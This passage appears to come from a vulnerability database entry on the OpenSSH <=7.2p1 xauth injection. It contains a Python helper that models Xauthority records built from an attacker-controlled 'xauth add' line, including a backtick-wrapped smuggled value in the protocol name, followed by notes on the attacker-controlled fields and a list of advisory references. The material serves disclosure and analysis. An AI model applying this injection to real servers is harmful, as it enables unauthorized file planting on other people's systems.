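"""
import struct

FAMILY_INTERNET = 0        # IPv4: the address field holds the 4 raw octets
FAMILY_LOCAL = 256         # local host name stored as a string
FAMILY_WILD = 65535


def _field(raw):
    return struct.pack(">H", len(raw)) + raw


def encode_record(family, address, number, name, data):
    """Serialise one entry; address, name and data are bytes, number is a str."""
    return (struct.pack(">H", family) + _field(address) + _field(number.encode())
            + _field(name) + _field(data))


def record_from_add(displayname, protocolname, hexkey):
    """Entry produced by `xauth add displayname protocolname hexkey`."""
    host, _, number = displayname.partition(":")
    octets = host.split(".")
    if len(octets) == 4 and all(o.isdigit() and int(o) < 256 for o in octets):
        family, address = FAMILY_INTERNET, bytes(int(o) for o in octets)
    else:  # simplification: treat anything else as a local display name
        family, address = FAMILY_LOCAL, host.encode()
    return encode_record(family, address, number, protocolname.encode(),
                         bytes.fromhex(hexkey))


def decode_records(blob):
    """Parse a whole Xauthority file into a list of dicts."""
    entries, pos = [], 0
    while pos < len(blob):
        (family,) = struct.unpack_from(">H", blob, pos)
        pos += 2
        fields = []
        for _ in range(4):
            (n,) = struct.unpack_from(">H", blob, pos)
            pos += 2
            fields.append(blob[pos:pos + n])
            pos += n
        address, number, name, data = fields
        entries.append({"family": family, "address": address,
                        "number": number.decode(), "name": name, "data": data})
    return entries


def visible(blob):
    """Approximation of what `cat` showed in the PoC transcript: control bytes
    vanish, everything else is rendered as Latin-1."""
    return "".join(chr(b) for b in blob if 0x20 <= b and b != 0x7f)


if __name__ == "__main__":
    rec = record_from_add("127.0.0.250:65500", "`thisisatestfile`", "aa")
    print(len(rec), "bytes:", rec.hex())
    print("as cat shows it:", visible(rec))
    print(decode_records(rec))
```

The attacker controls two fields: the auth name, taken verbatim from the `add` protocolname token and therefore free of whitespace, and the auth data, which is hex-decoded from the hexkey token and so can be arbitrary bytes. The family, address and length bytes are fixed by xauth, so every planted file starts with a non-printable header that whatever consumes it has to tolerate.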
| Field | Value |
| --- | --- |
| id | SSV:91041 |
| last seen | 2017-11-19 |
| modified | 2016-03-16 |
| published | 2016-03-16 |
| reporter | Root |
| source | https://www.seebug.org/vuldb/ssvid-91041 |
| title | OpenSSH <=7.2p1 xauth injection |
References
- http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/session.c.diff?r1=1.281&r2=1.282&f=h
- http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/usr.bin/ssh/session.c
- http://www.openssh.com/txt/x11fwd.adv
- http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html
- http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html
- http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html
- http://www.securityfocus.com/bid/84314
- http://lists.fedoraproject.org/pipermail/package-announce/2016-May/184264.html
- http://rhn.redhat.com/errata/RHSA-2016-0466.html
- http://lists.fedoraproject.org/pipermail/package-announce/2016-March/178838.html
- http://lists.fedoraproject.org/pipermail/package-announce/2016-March/180491.html
- http://lists.fedoraproject.org/pipermail/package-announce/2016-April/183122.html
- http://seclists.org/fulldisclosure/2016/Mar/46
- http://seclists.org/fulldisclosure/2016/Mar/47
- http://lists.fedoraproject.org/pipermail/package-announce/2016-April/183101.html
- https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115
- http://lists.fedoraproject.org/pipermail/package-announce/2016-March/179924.html
- https://www.exploit-db.com/exploits/39569/
- https://www.freebsd.org/security/advisories/FreeBSD-SA-16:14.openssh.asc
- https://bto.bluecoat.com/security-advisory/sa121
- http://packetstormsecurity.com/files/136234/OpenSSH-7.2p1-xauth-Command-Injection-Bypass.html
- http://www.securitytracker.com/id/1035249
- https://security.gentoo.org/glsa/201612-18
- http://rhn.redhat.com/errata/RHSA-2016-0465.html
- https://lists.debian.org/debian-lts-announce/2018/09/msg00010.html